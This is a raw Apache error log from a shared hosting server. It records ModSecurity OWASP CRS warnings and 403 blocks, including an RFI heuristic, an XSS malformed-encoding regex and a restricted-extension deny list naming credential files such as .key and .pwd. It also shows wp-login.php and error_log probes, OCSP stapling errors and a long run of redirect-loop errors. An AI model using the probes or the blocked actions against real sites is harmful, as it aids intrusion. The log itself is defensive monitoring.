[Tue May 12 07:38:42.695244 2026] [security2:error] [pid 1825287:tid 1825330] [client 23.21.227.240:47634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK84ggpmE1yW0glLdhXOgAAANg"]
[Tue May 12 07:39:10.945817 2026] [security2:error] [pid 1825179:tid 1825209] [client 100.27.153.9:5994] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camlifesex.com"] [unique_id "agK8_tr1yOh9TvizezjLVwAAAEs"]
[Tue May 12 07:39:10.946189 2026] [security2:error] [pid 1825179:tid 1825209] [client 100.27.153.9:5994] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camlifesex.com"] [unique_id "agK8_tr1yOh9TvizezjLVwAAAEs"]
[Tue May 12 07:39:10.946435 2026] [security2:error] [pid 1825179:tid 1825209] [client 100.27.153.9:5994] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camlifesex.com"] [unique_id "agK8_tr1yOh9TvizezjLVwAAAEs"]
[Tue May 12 07:39:21.946161 2026] [security2:error] [pid 1825287:tid 1825317] [client 43.155.129.131:37828] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK9CQgpmE1yW0glLdhXigAAAMw"]
[Tue May 12 07:39:29.460388 2026] [security2:error] [pid 1825179:tid 1825210] [client 43.163.107.243:57016] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agK9Edr1yOh9TvizezjLcAAAAEw"], referer: http://www.tchatbooster.fr
[Tue May 12 07:39:40.387289 2026] [security2:error] [pid 1825179:tid 1825201] [client 80.13.153.140:42546] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agK9HNr1yOh9TvizezjLegAAAEM"]
[Tue May 12 07:39:40.480365 2026] [ssl:error] [pid 1916576:tid 1916582] (EAI 2)Name or service not known: [client 116.202.235.23:26456] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:39:40.480407 2026] [ssl:error] [pid 1916576:tid 1916582] AH01941: stapling_renew_response: responder error
[Tue May 12 07:39:40.587515 2026] [ssl:error] [pid 1844863:tid 1844873] (EAI 2)Name or service not known: [client 116.202.235.23:26458] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:39:40.587542 2026] [ssl:error] [pid 1844863:tid 1844873] AH01941: stapling_renew_response: responder error
[Tue May 12 07:39:40.673514 2026] [ssl:error] [pid 1842385:tid 1842395] (EAI 2)Name or service not known: [client 116.202.235.23:26472] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:39:40.673541 2026] [ssl:error] [pid 1842385:tid 1842395] AH01941: stapling_renew_response: responder error
[Tue May 12 07:39:40.799230 2026] [ssl:error] [pid 1825179:tid 1825197] (EAI 2)Name or service not known: [client 116.202.235.23:26486] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:39:40.799258 2026] [ssl:error] [pid 1825179:tid 1825197] AH01941: stapling_renew_response: responder error
[Tue May 12 07:41:05.795137 2026] [cgid:error] [pid 1825287:tid 1825309] [client 216.73.216.110:23993] Script timed out before returning headers: ea-php74
[Tue May 12 07:41:07.484634 2026] [:error] [pid 1844863:tid 1844882] [client 192.171.88.141:10073] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Tue May 12 07:41:10.783167 2026] [:error] [pid 1825287:tid 1825307] [client 192.171.88.141:9389] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Tue May 12 07:41:51.847124 2026] [ssl:error] [pid 1825179:tid 1825214] [client 3.233.59.216:37685] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpanel.crm2.rentparadise.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 07:42:40.409343 2026] [security2:error] [pid 1916576:tid 1916600] [client 150.109.12.46:52212] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-json/wp/v2/posts/1043"] [unique_id "agK90Mz9SA3M95KBdjnRIgAAABY"]
[Tue May 12 07:42:57.930494 2026] [authz_core:error] [pid 1825287:tid 1825326] [client 47.128.47.124:48010] AH01630: client denied by server configuration: /home/missmand/public_html/lib/app/error_log
[Tue May 12 07:44:01.071275 2026] [:error] [pid 1844863:tid 1844891] [client 46.151.178.13:50480] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 07:44:08.506905 2026] [authz_core:error] [pid 1844863:tid 1844879] [client 47.128.58.229:40844] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/theme-compat/error_log
[Tue May 12 07:44:46.304790 2026] [core:error] [pid 1844863:tid 1844874] [client 138.199.60.34:46242] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:44:46.304836 2026] [core:error] [pid 1844863:tid 1844874] [client 138.199.60.34:46242] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:44:59.871837 2026] [security2:error] [pid 1825287:tid 1825310] [client 18.208.11.93:35974] ModSecurity: Warning. Pattern match "(?:\\xc2\\xbe|\\xc2\\xbc).*(?:\\xc2\\xbe|\\xc2\\xbc|>)|(?:\\xc2\\xbe|\\xc2\\xbc|<).*(?:\\xc2\\xbe|\\xc2\\xbc)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "136"] [id "941310"] [rev "2"] [msg "US-ASCII Malformed Encoding XSS Filter - Attack Detected."] [data "Matched Data: \\xc2\\xbc/\\xc3\\xab\\xc2\\xb0\\xc2\\x94\\xc3\\xac\\xc2\\xb9\\xc2\\xb4\\xc3\\xab\\xc2\\x9d\\xc2\\xbc found within ARGS:url: https://www.chosunbet.com/\\xc3\\xab\\xc2\\xb0\\xc2\\x94\\xc3\\xac\\xc2\\xb9\\xc2\\xb4\\xc3\\xab\\xc2\\x9d\\xc2\\xbc/\\xc3\\xab\\xc2\\xb0\\xc2\\x94\\xc3\\xac\\xc2\\xb9\\xc2\\xb4\\xc3\\xab\\xc2\\x9d\\xc2\\xbc\\xc3\\xac\\xc2\\x97\\xc2\\x90\\xc3\\xac\\xc2\\x84\\xc2\\x9c-\\xc3\\xac\\xc2\\x9a\\xc2\\xb0\\xc3\\xab\\xc2\\xa6\\xc2\\xac\\xc3\\xab\\xc2\\x93\\xc2\\xa4\\xc3\\xac\\xc2\\x9d\\xc2\\xb4-\\xc3\\xab\\xc2\\xb6\\xc2\\x88\\xc3\\xab\\xc2\\xa6\\xc2\\xac\\xc3\\xad\\xc2\\x95\\xc2\\x9c\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-tomcat"] [tag "attack- [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK-WwgpmE1yW0glLdhZBgAAAMU"]
[Tue May 12 07:44:59.872117 2026] [security2:error] [pid 1825287:tid 1825310] [client 18.208.11.93:35974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK-WwgpmE1yW0glLdhZBgAAAMU"]
[Tue May 12 07:44:59.872349 2026] [security2:error] [pid 1825287:tid 1825310] [client 18.208.11.93:35974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): US-ASCII Malformed Encoding XSS Filter - Attack Detected."] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK-WwgpmE1yW0glLdhZBgAAAMU"]
[Tue May 12 07:45:04.612987 2026] [core:error] [pid 1844863:tid 1844869] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:04.613031 2026] [core:error] [pid 1844863:tid 1844869] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:05.092026 2026] [core:error] [pid 1825179:tid 1825210] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:05.092061 2026] [core:error] [pid 1825179:tid 1825210] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:05.566856 2026] [core:error] [pid 1825287:tid 1825312] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:05.566902 2026] [core:error] [pid 1825287:tid 1825312] [client 4.193.137.131:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.045945 2026] [core:error] [pid 1842385:tid 1842405] [client 4.193.137.131:30185] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.045984 2026] [core:error] [pid 1842385:tid 1842405] [client 4.193.137.131:30185] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.522647 2026] [core:error] [pid 1825287:tid 1825315] [client 4.193.137.131:30182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.522675 2026] [core:error] [pid 1825287:tid 1825315] [client 4.193.137.131:30182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.999338 2026] [core:error] [pid 1842385:tid 1842397] [client 4.193.137.131:30161] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:06.999374 2026] [core:error] [pid 1842385:tid 1842397] [client 4.193.137.131:30161] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:07.503042 2026] [core:error] [pid 1825179:tid 1825212] [client 4.193.137.131:30184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:07.503075 2026] [core:error] [pid 1825179:tid 1825212] [client 4.193.137.131:30184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:07.994326 2026] [core:error] [pid 1844863:tid 1844870] [client 4.193.137.131:30179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:07.994369 2026] [core:error] [pid 1844863:tid 1844870] [client 4.193.137.131:30179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:08.474454 2026] [core:error] [pid 1916576:tid 1916579] [client 4.193.137.131:30159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:08.474487 2026] [core:error] [pid 1916576:tid 1916579] [client 4.193.137.131:30159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:08.950452 2026] [core:error] [pid 1825287:tid 1825322] [client 4.193.137.131:17167] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:08.950491 2026] [core:error] [pid 1825287:tid 1825322] [client 4.193.137.131:17167] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:09.425362 2026] [core:error] [pid 1844863:tid 1844872] [client 4.193.137.131:30188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:09.425398 2026] [core:error] [pid 1844863:tid 1844872] [client 4.193.137.131:30188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:09.900187 2026] [core:error] [pid 1825179:tid 1825197] [client 4.193.137.131:30188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:09.900221 2026] [core:error] [pid 1825179:tid 1825197] [client 4.193.137.131:30188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:10.373549 2026] [core:error] [pid 1844863:tid 1844878] [client 4.193.137.131:30174] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:10.373579 2026] [core:error] [pid 1844863:tid 1844878] [client 4.193.137.131:30174] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:10.846817 2026] [core:error] [pid 1916576:tid 1916591] [client 4.193.137.131:30170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:10.846854 2026] [core:error] [pid 1916576:tid 1916591] [client 4.193.137.131:30170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:11.384167 2026] [core:error] [pid 1825179:tid 1825206] [client 4.193.137.131:30168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:11.384205 2026] [core:error] [pid 1825179:tid 1825206] [client 4.193.137.131:30168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:11.869545 2026] [core:error] [pid 1825287:tid 1825318] [client 4.193.137.131:30156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:11.869576 2026] [core:error] [pid 1825287:tid 1825318] [client 4.193.137.131:30156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:12.343413 2026] [core:error] [pid 1916576:tid 1916580] [client 4.193.137.131:30178] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:12.343449 2026] [core:error] [pid 1916576:tid 1916580] [client 4.193.137.131:30178] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:12.817700 2026] [core:error] [pid 1825287:tid 1825323] [client 4.193.137.131:30162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:12.817737 2026] [core:error] [pid 1825287:tid 1825323] [client 4.193.137.131:30162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:13.293182 2026] [core:error] [pid 1842385:tid 1842392] [client 4.193.137.131:30189] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:13.293208 2026] [core:error] [pid 1842385:tid 1842392] [client 4.193.137.131:30189] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:13.768130 2026] [core:error] [pid 1825287:tid 1825327] [client 4.193.137.131:30172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:13.768164 2026] [core:error] [pid 1825287:tid 1825327] [client 4.193.137.131:30172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:14.247440 2026] [core:error] [pid 1842385:tid 1842406] [client 4.193.137.131:17152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:14.247473 2026] [core:error] [pid 1842385:tid 1842406] [client 4.193.137.131:17152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:14.729875 2026] [core:error] [pid 1916576:tid 1916595] [client 4.193.137.131:30155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:14.729932 2026] [core:error] [pid 1916576:tid 1916595] [client 4.193.137.131:30155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:15.204306 2026] [core:error] [pid 1916576:tid 1916592] [client 4.193.137.131:30183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:15.204332 2026] [core:error] [pid 1916576:tid 1916592] [client 4.193.137.131:30183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:15.678823 2026] [core:error] [pid 1844863:tid 1844875] [client 4.193.137.131:30166] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:15.678851 2026] [core:error] [pid 1844863:tid 1844875] [client 4.193.137.131:30166] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:16.151834 2026] [core:error] [pid 1842385:tid 1842408] [client 4.193.137.131:30165] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:16.151872 2026] [core:error] [pid 1842385:tid 1842408] [client 4.193.137.131:30165] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:16.625553 2026] [core:error] [pid 1916576:tid 1916593] [client 4.193.137.131:30173] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:16.625587 2026] [core:error] [pid 1916576:tid 1916593] [client 4.193.137.131:30173] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:17.100035 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:30179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:17.100062 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:30179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:17.573915 2026] [core:error] [pid 1916576:tid 1916602] [client 4.193.137.131:30198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:17.573947 2026] [core:error] [pid 1916576:tid 1916602] [client 4.193.137.131:30198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:18.081094 2026] [core:error] [pid 1844863:tid 1844880] [client 4.193.137.131:30170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:18.081130 2026] [core:error] [pid 1844863:tid 1844880] [client 4.193.137.131:30170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:18.555042 2026] [core:error] [pid 1825179:tid 1825208] [client 4.193.137.131:30180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:18.555071 2026] [core:error] [pid 1825179:tid 1825208] [client 4.193.137.131:30180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:19.042751 2026] [core:error] [pid 1916576:tid 1916582] [client 4.193.137.131:30162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
